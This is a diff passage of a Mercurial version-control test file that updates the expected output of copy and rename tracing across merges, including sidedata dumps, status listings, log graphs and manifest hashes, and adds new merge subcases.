+ ##### revision "mDBm-0 simple merge - B side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 19 #####
+ ##### revision "mAEm-0 merge with copies info on both side - A side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f'
merged : f, ;
- ##### revision 20 #####
+ ##### revision "mEAm-0 merge with copies info on both side - A side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f'
merged : f, ;
- ##### revision 21 #####
+ ##### revision "mPQm-0 merge with copies info on both side - P side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00v'
+ merged : v, ;
+ ##### revision "mQPm-0 merge with copies info on both side - P side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00v'
+ merged : v, ;
+ ##### revision "f-1" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00hi'
removed : h, ;
added p1: i, h;
- ##### revision 22 #####
+ ##### revision "f-2" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x16\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00di'
touched p1: d, i;
removed : i, ;
- ##### revision 23 #####
+ ##### revision "mBFm-0 simple merge - B side" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mFBm-0 simple merge - B side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 24 #####
+ ##### revision "r-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00rx'
+ removed : r, ;
+ added p1: x, r;
+ ##### revision "r-2" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x02\x16\x00\x00\x00\x01\x00\x00\x00\x01\x0c\x00\x00\x00\x02\x00\x00\x00\x00tx'
+ touched p1: t, x;
+ removed : x, ;
+ ##### revision "mBRm-0 simple merge - B side" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 25 #####
+ ##### revision "mRBm-0 simple merge - B side" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "g-1" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d'
touched : d, ;
- ##### revision 26 #####
- 1 sidedata entries
- entry-0014 size 14
- '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d'
- merged : d, ;
- ##### revision 27 #####
+ ##### revision "mDGm-0 actual content merge, copies on one side - D side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d'
merged : d, ;
- ##### revision 28 #####
+ ##### revision "mGDm-0 actual content merge, copies on one side - D side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d'
merged : d, ;
- ##### revision 29 #####
+ ##### revision "mFGm-0 merge - G side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d'
merged : d, ;
- ##### revision 30 #####
+ ##### revision "mGFm-0 merge - G side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00d'
+ merged : d, ;
+ ##### revision "mCGm-0 merge updated/deleted - revive the file (updated content) - one way" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d'
salvaged : d, ;
- ##### revision 31 #####
+ ##### revision "mGCm-0 merge updated/deleted - revive the file (updated content) - the other way" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d'
salvaged : d, ;
- ##### revision 32 #####
+ ##### revision "mCB-revert-m-0 merge explicitely revive deleted file - B side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d'
salvaged : d, ;
- ##### revision 33 #####
+ ##### revision "mBC-revert-m-0 merge explicitely revive deleted file - B side" #####
1 sidedata entries
entry-0014 size 14
'\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d'
salvaged : d, ;
- ##### revision 34 #####
+ ##### revision "h-1" #####
1 sidedata entries
entry-0014 size 24
'\x00\x00\x00\x02\x0c\x00\x00\x00\x01\x00\x00\x00\x00\x06\x00\x00\x00\x02\x00\x00\x00\x00bd'
removed : b, ;
added p1: d, b;
- ##### revision 35 #####
+ ##### revision "mCH-delete-before-conflict-m-0 simple merge - C side" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mHC-delete-before-conflict-m-0 simple merge - C side" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mAE-change-m-0 merge with file update and copies info on both side - A side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f'
+ merged : f, ;
+ ##### revision "mEA-change-m-0 merge with file update and copies info on both side - A side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x08\x00\x00\x00\x01\x00\x00\x00\x00f'
+ merged : f, ;
+ ##### revision "mBF-change-m-0 merge with extra change - B side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d'
+ touched : d, ;
+ ##### revision "mFB-change-m-0 merge with extra change - B side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x14\x00\x00\x00\x01\x00\x00\x00\x00d'
+ touched : d, ;
+ ##### revision "mCB-change-m-0 merge explicitely revive deleted file - B side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d'
+ salvaged : d, ;
+ ##### revision "mBC-change-m-0 merge explicitely revive deleted file - B side" #####
+ 1 sidedata entries
+ entry-0014 size 14
+ '\x00\x00\x00\x01\x10\x00\x00\x00\x01\x00\x00\x00\x00d'
+ salvaged : d, ;
+ ##### revision "j-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j'
+ added : unrelated-j, ;
+ ##### revision "k-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-k'
+ added : unrelated-k, ;
+ ##### revision "mAE,Km" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mK,AEm" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
- ##### revision 36 #####
+ ##### revision "mEA,Jm" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j'
+ touched : unrelated-j, ;
+ ##### revision "mJ,EAm" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x14\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-j'
+ touched : unrelated-j, ;
+ ##### revision "s-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-s'
+ added : unrelated-s, ;
+ ##### revision "t-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-t'
+ added : unrelated-t, ;
+ ##### revision "mPQ,Tm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mT,PQm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mQP,Sm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mS,QPm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "l-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-l'
+ added : unrelated-l, ;
+ ##### revision "mBC+revert,Lm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mCB+revert,Lm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mL,BC+revertm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mL,CB+revertm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "n-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-n'
+ added : unrelated-n, ;
+ ##### revision "o-1" #####
+ 1 sidedata entries
+ entry-0014 size 24
+ '\x00\x00\x00\x01\x04\x00\x00\x00\x0b\x00\x00\x00\x00unrelated-o'
+ added : unrelated-o, ;
+ ##### revision "mFG,Om" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mO,FGm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mGF,Nm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mN,GFm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mAE-change,Km" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mK,AE-change-m" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mEA-change,Jm" #####
+ 1 sidedata entries
+ entry-0014 size 4
+ '\x00\x00\x00\x00'
+ ##### revision "mJ,EA-change-m" #####
1 sidedata entries
entry-0014 size 4
'\x00\x00\x00\x00'
@@ -927,7 +2116,10 @@
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("a-2")'
A f
a
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("a-2")' f
A f
a (no-changeset no-compatibility !)
@@ -939,21 +2131,21 @@
- unrelated change on the other side
$ hg log -G --rev '::(desc("mABm")+desc("mBAm"))'
- o 12 mABm-0 simple merge - the other way
+ o mABm-0 simple merge - A side: multiple renames, B side: unrelated update - the other way
|\
- +---o 11 mBAm-0 simple merge - one way
+ +---o mBAm-0 simple merge - A side: multiple renames, B side: unrelated update - one way
| |/
- | o 5 b-1: b update
+ | o b-1: b update
| |
- o | 4 a-2: e -move-> f
+ o | a-2: e -move-> f
| |
- o | 3 a-1: d -move-> e
+ o | a-1: d -move-> e
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
$ hg status --copies --rev 'desc("b-1")' --rev 'desc("mABm")'
@@ -982,12 +2174,18 @@
M b
A f
a
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBAm")'
M b
A f
a
+ A t
+ p
R a
+ R p
merging with the side having a delete
-------------------------------------
@@ -998,23 +2196,23 @@
and recreate an unrelated file after the merge
$ hg log -G --rev '::(desc("mCBm")+desc("mBCm"))'
- o 16 mCBm-1 re-add d
+ o mCBm-1 re-add d
|
- o 15 mCBm-0 simple merge - the other way
+ o mCBm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - the other way
|\
- | | o 14 mBCm-1 re-add d
+ | | o mBCm-1 re-add d
| | |
- +---o 13 mBCm-0 simple merge - one way
+ +---o mBCm-0 simple merge - C side: delete a file with copies history , B side: unrelated update - one way
| |/
- | o 6 c-1 delete d
+ | o c-1 delete d
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
- comparing from the merge
@@ -1034,10 +2232,16 @@
R d
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBCm-0")'
M b
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCBm-0")'
M b
+ A t
+ p
R a
+ R p
- comparing with the merge children re-adding the file
@@ -1060,11 +2264,17 @@
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBCm-1")'
M b
A d
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mCBm-1")'
M b
A d
+ A t
+ p
R a
+ R p
Comparing with a merge re-adding the file afterward
---------------------------------------------------
@@ -1074,21 +2284,21 @@
- one deleting and recreating the change
$ hg log -G --rev '::(desc("mDBm")+desc("mBDm"))'
- o 18 mDBm-0 simple merge - the other way
+ o mDBm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - the other way
|\
- +---o 17 mBDm-0 simple merge - one way
+ +---o mBDm-0 simple merge - B side: unrelated update, D side: delete and recreate a file (with different content) - one way
| |/
- | o 8 d-2 re-add d
+ | o d-2 re-add d
| |
- | o 7 d-1 delete d
+ | o d-1 delete d
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
$ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBDm-0")'
M d
@@ -1115,93 +2325,102 @@
$ hg manifest --debug --rev 'desc("d-2")' | grep '644 d'
b004912a8510032a0350a74daa2803dadfb00e12 644 d
$ hg manifest --debug --rev 'desc("b-1")' | grep '644 d'
- 169be882533bc917905d46c0c951aa9a1e288dcf 644 d (no-changeset !)
- b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3 644 d (changeset !)
- $ hg debugindex d | head -n 4
+ d8252ab2e760b0d4e5288fd44cbd15a0fa567e16 644 d (no-changeset !)
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 d (changeset !)
+ $ hg debugindex d | head -n 4 | ../no-linkrev
rev linkrev nodeid p1 p2
- 0 2 169be882533b 000000000000 000000000000 (no-changeset !)
- 0 2 b789fdd96dc2 000000000000 000000000000 (changeset !)
- 1 8 b004912a8510 000000000000 000000000000
- 2 22 4a067cf8965d 000000000000 000000000000 (no-changeset !)
- 2 22 fe6f8b4f507f 000000000000 000000000000 (changeset !)
+ 0 * d8252ab2e760 000000000000 000000000000 (no-changeset !)
+ 0 * ae258f702dfe 000000000000 000000000000 (changeset !)
+ 1 * b004912a8510 000000000000 000000000000
+ 2 * 7b79e2fe0c89 000000000000 000000000000 (no-changeset !)
+ 2 * 5cce88bf349f ae258f702dfe 000000000000 (changeset !)
Log output should not include a merge commit as it did not happen
$ hg log -Gfr 'desc("mBDm-0")' d
- o 8 d-2 re-add d
+ o d-2 re-add d
|
~
$ hg log -Gfr 'desc("mDBm-0")' d
- o 8 d-2 re-add d
+ o d-2 re-add d
|
~
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBDm-0")'
M b
A d
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mDBm-0")'
M b
A d
+ A t
+ p
R a
+ R p
Comparing with a merge with colliding rename
--------------------------------------------
+Subcase: new copy information on both sides
+`````````````````````````````````````````````
+
- the "e-" branch renaming b to f (through 'g')
- the "a-" branch renaming d to f (through e)
$ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))'
- o 20 mEAm-0 simple merge - the other way
+ o mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way
|\
- +---o 19 mAEm-0 simple merge - one way
+ +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way
| |/
- | o 10 e-2 g -move-> f
+ | o e-2 g -move-> f
| |
- | o 9 e-1 b -move-> g
+ | o e-1 b -move-> g
| |
- o | 4 a-2: e -move-> f
+ o | a-2: e -move-> f
| |
- o | 3 a-1: d -move-> e
+ o | a-1: d -move-> e
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#if no-changeset
$ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f'
- c39c6083dad048d5138618a46f123e2f397f4f18 644 f
+ 2ff93c643948464ee1f871867910ae43a45b0bea 644 f
$ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f'
- a9a8bc3860c9d8fa5f2f7e6ea8d40498322737fd 644 f
+ 2ff93c643948464ee1f871867910ae43a45b0bea 644 f
$ hg manifest --debug --rev 'desc("a-2")' | grep '644 f'
- 263ea25e220aaeb7b9bac551c702037849aa75e8 644 f
+ b76eb76580df486c3d51d63c5c210d4dd43a8ac7 644 f
$ hg manifest --debug --rev 'desc("e-2")' | grep '644 f'
- 71b9b7e73d973572ade6dd765477fcee6890e8b1 644 f
- $ hg debugindex f
+ e8825b386367b29fec957283a80bb47b47483fe1 644 f
+ $ hg debugindex f | ../no-linkrev
rev linkrev nodeid p1 p2
- 0 4 263ea25e220a 000000000000 000000000000
- 1 10 71b9b7e73d97 000000000000 000000000000
- 2 19 c39c6083dad0 263ea25e220a 71b9b7e73d97
- 3 20 a9a8bc3860c9 71b9b7e73d97 263ea25e220a
+ 0 * b76eb76580df 000000000000 000000000000
+ 1 * e8825b386367 000000000000 000000000000
+ 2 * 2ff93c643948 b76eb76580df e8825b386367
+ 3 * 2f649fba7eb2 b76eb76580df e8825b386367
+ 4 * 774e7c1637d5 e8825b386367 b76eb76580df
#else
$ hg manifest --debug --rev 'desc("mAEm-0")' | grep '644 f'
- 498e8799f49f9da1ca06bb2d6d4accf165c5b572 644 f
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f
$ hg manifest --debug --rev 'desc("mEAm-0")' | grep '644 f'
- c5b506a7118667a38a9c9348a1f63b679e382f57 644 f
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f
$ hg manifest --debug --rev 'desc("a-2")' | grep '644 f'
- b789fdd96dc2f3bd229c1dd8eedf0fc60e2b68e3 644 f
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f
$ hg manifest --debug --rev 'desc("e-2")' | grep '644 f'
- 1e88685f5ddec574a34c70af492f95b6debc8741 644 f
- $ hg debugindex f
+ ae258f702dfeca05bf9b6a22a97a4b5645570f11 644 f
+ $ hg debugindex f | ../no-linkrev
rev linkrev nodeid p1 p2
- 0 4 b789fdd96dc2 000000000000 000000000000
- 1 10 1e88685f5dde 000000000000 000000000000
- 2 19 498e8799f49f b789fdd96dc2 1e88685f5dde
- 3 20 c5b506a71186 1e88685f5dde b789fdd96dc2
+ 0 * ae258f702dfe 000000000000 000000000000
+ 1 * d3613c1ec831 ae258f702dfe 000000000000
+ 2 * 05e03c868bbc ae258f702dfe 000000000000
#endif
# Here the filelog based implementation is not looking at the rename
@@ -1209,20 +2428,20 @@
# based on works fine. We have different output.
$ hg status --copies --rev 'desc("a-2")' --rev 'desc("mAEm-0")'
- M f
- b (no-filelog !)
+ M f (no-changeset !)
+ b (no-filelog no-changeset !)
R b
$ hg status --copies --rev 'desc("a-2")' --rev 'desc("mEAm-0")'
- M f
- b (no-filelog !)
+ M f (no-changeset !)
+ b (no-filelog no-changeset !)
R b
$ hg status --copies --rev 'desc("e-2")' --rev 'desc("mAEm-0")'
- M f
- d (no-filelog !)
+ M f (no-changeset !)
+ d (no-filelog no-changeset !)
R d
$ hg status --copies --rev 'desc("e-2")' --rev 'desc("mEAm-0")'
- M f
- d (no-filelog !)
+ M f (no-changeset !)
+ d (no-filelog no-changeset !)
R d
$ hg status --copies --rev 'desc("i-2")' --rev 'desc("a-2")'
A f
@@ -1258,15 +2477,24 @@
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mAEm-0")'
A f
a
+ A t
+ p
R a
R b
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mEAm-0")'
A f
a (filelog !)
b (no-filelog !)
+ A t
+ p
R a
R b
-
+ R p
+
+
+Subcase: existing copy information overwritten on one branch
+````````````````````````````````````````````````````````````
Note:
| In this case, one of the merge wrongly record a merge while there is none.
@@ -1278,90 +2506,196 @@
- one overwriting a file (d) with a rename (from h to i to d)
$ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))'
- o 24 mFBm-0 simple merge - the other way
+ o mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
|\
- +---o 23 mBFm-0 simple merge - one way
+ +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
| |/
- | o 22 f-2: rename i -> d
+ | o f-2: rename i -> d
| |
- | o 21 f-1: rename h -> i
+ | o f-1: rename h -> i
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBFm-0")'
M b
A d
h
+ A t
+ p
R a
R h
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mFBm-0")'
M b
A d
h
+ A t
+ p
R a
R h
+ R p
$ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBFm-0")'
- M d
- h (no-filelog !)
+ M d (no-changeset !)
+ h (no-filelog no-changeset !)
R h
$ hg status --copies --rev 'desc("f-2")' --rev 'desc("mBFm-0")'
M b
$ hg status --copies --rev 'desc("f-1")' --rev 'desc("mBFm-0")'
M b
- M d
- i (no-filelog !)
+ M d (no-changeset !)
+ i (no-filelog no-changeset !)
R i
$ hg status --copies --rev 'desc("b-1")' --rev 'desc("mFBm-0")'
- M d
- h (no-filelog !)
+ M d (no-changeset !)
+ h (no-filelog no-changeset !)
R h
$ hg status --copies --rev 'desc("f-2")' --rev 'desc("mFBm-0")'
M b
$ hg status --copies --rev 'desc("f-1")' --rev 'desc("mFBm-0")'
M b
- M d
- i (no-filelog !)
+ M d (no-changeset !)
+ i (no-filelog no-changeset !)
R i
#if no-changeset
$ hg log -Gfr 'desc("mBFm-0")' d
- o 22 f-2: rename i -> d
+ o f-2: rename i -> d
|
- o 21 f-1: rename h -> i
+ o f-1: rename h -> i
:
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#else
BROKEN: `hg log --follow <file>` relies on filelog metadata to work
$ hg log -Gfr 'desc("mBFm-0")' d
- o 22 f-2: rename i -> d
+ o i-2: c -move-> d, s -move-> t
|
~
#endif
#if no-changeset
$ hg log -Gfr 'desc("mFBm-0")' d
- o 22 f-2: rename i -> d
+ o f-2: rename i -> d
|
- o 21 f-1: rename h -> i
+ o f-1: rename h -> i
:
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#else
BROKEN: `hg log --follow <file>` relies on filelog metadata to work
$ hg log -Gfr 'desc("mFBm-0")' d
- o 22 f-2: rename i -> d
+ o i-2: c -move-> d, s -move-> t
|
~
#endif
+Subcase: existing copy information overwritten on one branch, with different content
+`````````````````````````````````````````````````````````````````````````````````````
+
+Merge:
+- one with change to an unrelated file (b)
+- one overwriting a file (t) with a rename (from r to x to t); the new content is not the same as on the other branch
+
+ $ hg log -G --rev '::(desc("mBRm")+desc("mRBm"))'
+ o mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way
+ |\
+ +---o mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way
+ | |/
+ | o r-2: rename t -> x
+ | |
+ | o r-1: rename r -> x
+ | |
+ o | b-1: b update
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mBRm-0")'
+ M b
+ A d
+ a
+ A t
+ r
+ R a
+ R p
+ R r
+ $ hg status --copies --rev 'desc("i-0")' --rev 'desc("mRBm-0")'
+ M b
+ A d
+ a
+ A t
+ r
+ R a
+ R p
+ R r
+ $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mBRm-0")'
+ M t
+ r (no-filelog !)
+ R r
+ $ hg status --copies --rev 'desc("r-2")' --rev 'desc("mBRm-0")'
+ M b
+ $ hg status --copies --rev 'desc("r-1")' --rev 'desc("mBRm-0")'
+ M b
+ M t
+ x (no-filelog !)
+ R x
+ $ hg status --copies --rev 'desc("b-1")' --rev 'desc("mRBm-0")'
+ M t
+ r (no-filelog !)
+ R r
+ $ hg status --copies --rev 'desc("r-2")' --rev 'desc("mRBm-0")'
+ M b
+ $ hg status --copies --rev 'desc("r-1")' --rev 'desc("mRBm-0")'
+ M b
+ M t
+ x (no-filelog !)
+ R x
+
+#if no-changeset
+ $ hg log -Gfr 'desc("mBRm-0")' d
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+#else
+BROKEN: `hg log --follow <file>` relies on filelog metadata to work
+ $ hg log -Gfr 'desc("mBRm-0")' d
+ o i-2: c -move-> d, s -move-> t
+ |
+ ~
+#endif
+
+#if no-changeset
+ $ hg log -Gfr 'desc("mRBm-0")' d
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+#else
+BROKEN: `hg log --follow <file>` relies on filelog metadata to work
+ $ hg log -Gfr 'desc("mRBm-0")' d
+ o i-2: c -move-> d, s -move-> t
+ |
+ ~
+#endif
+
+Subcase: reset of the copy history on one side
+``````````````````````````````````````````````
+
Merge:
- one with change to a file
- one deleting and recreating the file
@@ -1370,21 +2704,21 @@
consider history and renames on both branches of the merge.
$ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))'
- o 27 mGDm-0 simple merge - the other way
+ o mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way
|\
- +---o 26 mDGm-0 simple merge - one way
+ +---o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
| |/
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 8 d-2 re-add d
+ o | d-2 re-add d
| |
- o | 7 d-1 delete d
+ o | d-1 delete d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
One side of the merge has a long history with renames. The other side of the
merge points to a new file with a shorter history. Each side is "valid".
@@ -1395,11 +2729,17 @@
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mDGm-0")'
A d
a (filelog !)
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("i-0")' --rev 'desc("mGDm-0")'
A d
a
+ A t
+ p
R a
+ R p
$ hg status --copies --rev 'desc("d-2")' --rev 'desc("mDGm-0")'
M d
$ hg status --copies --rev 'desc("d-2")' --rev 'desc("mGDm-0")'
@@ -1411,28 +2751,28 @@
#if no-changeset
$ hg log -Gfr 'desc("mDGm-0")' d
- o 26 mDGm-0 simple merge - one way
+ o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
|\
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 8 d-2 re-add d
+ o | d-2 re-add d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
#else
BROKEN: `hg log --follow <file>` relies on filelog metadata to work
$ hg log -Gfr 'desc("mDGm-0")' d
- o 26 mDGm-0 simple merge - one way
+ o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
|\
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 8 d-2 re-add d
+ o | d-2 re-add d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
~
#endif
@@ -1440,32 +2780,34 @@
#if no-changeset
$ hg log -Gfr 'desc("mDGm-0")' d
- o 26 mDGm-0 simple merge - one way
+ o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way
|\
- | o 25 g-1: update d
+ | o g-1: update d
| |
